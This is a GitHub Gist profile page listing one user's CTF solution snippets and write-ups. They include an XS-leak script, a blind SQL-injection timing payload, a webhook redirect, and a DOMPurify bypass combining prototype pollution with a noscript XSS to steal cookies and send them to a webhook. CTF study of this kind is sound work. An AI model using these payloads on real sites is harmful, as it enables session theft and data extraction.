Skip to content

Instantly share code, notes, and snippets.

View parrot409's full-sized avatar
🏴
Maybe doing CTF?

parrot409 parrot409

🏴
Maybe doing CTF?
42 followers · 9 following
View GitHub Profile
@parrot409
parrot409 / solve.html
Last active January 21, 2024 19:13
Gimme-Content-Type - mapna 2023
<a id=f >sdf</a>
<div id=t >
</div>
<script>
function addFrame(src,h){
let el = document.createElement('iframe')
el.src = src
el.onload = h
t.innerHTML = ''
@parrot409
parrot409 / README.md
Last active September 4, 2023 13:49
corctf 2023 - leakynote & pdfpal

Leaky note

The challenge:

404 page XSLeak SSLeak? challenge but the session cookie's samsite attribute is Lax. We have HTML injection in one of the pages but there is a csp.

Content-Security-Policy "script-src 'none'; object-src 'none'; frame-ancestors 'none';";
@parrot409
parrot409 / hack.html
Created October 30, 2022 21:37
food-api hack.lu ctf 2022
```html
<script>
const target = 'https://0.0.0.0/api/food/555??=`in()*?;select%20/*--%20%27&b%20%271*/%271%27from%20flag%20where%20randomblob((CASE%20WHEN%20(SUBSTR((SELECT%20flag%20FROM%20flag),IDX,1)%3d%27CHR%27)%20THEN%205000000%20ELSE%201%20END))--=dfdf'
const alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
var flag = ''
async function atk(){
let tbl = []
for(let i=0;i<alphabet.length;i++){
@parrot409
parrot409 / wow.py
Created September 19, 2022 09:19
0ctf 2022 - jabasass
#!/usr/bin/env python3
# import requests_ as requests
# from requests_.auth import HTTPDigestAuth
# url = 'http://localhost:9990/management-upload'
# r = requests.post(url,headers={'Origin':'http://localhost:9990'},auth=HTTPDigestAuth('admin', 'admin'))
# print(r.text)
import _socket
import math
import hashlib
@parrot409
parrot409 / rem.php
Created December 27, 2021 17:09
SCTF 2021 - christmas-wishes
<?php
function conv($l){
$g = unpack("C*", pack("Q",$l));
$r = "";
for($i=0;$i<8;$i++){
if($g[$i] != 0){
$r.= chr($g[$i]);
}
}
return $r;
@parrot409
parrot409 / rem.html
Last active December 14, 2021 14:11
X-note writeup - SECCON CTF 2021
<html>
<head>
<title>rem rem rem</title>
</head>
<body>
<div id="atk">
</div>
<script>
// const TARGET = "http://localhost:8000"
@parrot409
parrot409 / index.html
Created November 12, 2021 15:54
f
<script>
document.location = "https://webhook.site/01b6b49c-2e31-4fa4-8e0d-f87f208586e4"
</script>
@parrot409
parrot409 / index.html
Created November 12, 2021 15:48
oh yesa
f
@parrot409
parrot409 / lmao
Created November 12, 2021 15:41
sdfsdf
lmao
@parrot409
parrot409 / wus.md
Last active April 24, 2021 17:43

So safe website

I inspired this challenge while i was playing a challenge by @53c0nd-2473.

  1. Overwrite Object object's getOwnPropertyNames with "nice feature" to bypass dompurify + trusted types. {"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}
  2. Bypass custom filter with noscript tag. example: <noscript><img src="</noscript><img src=1 onerror=alert()">
  3. Steal cookies with using debug.js and set parent's name to cookies and do redirect with meta tag
  4. Send window.name to your webhook.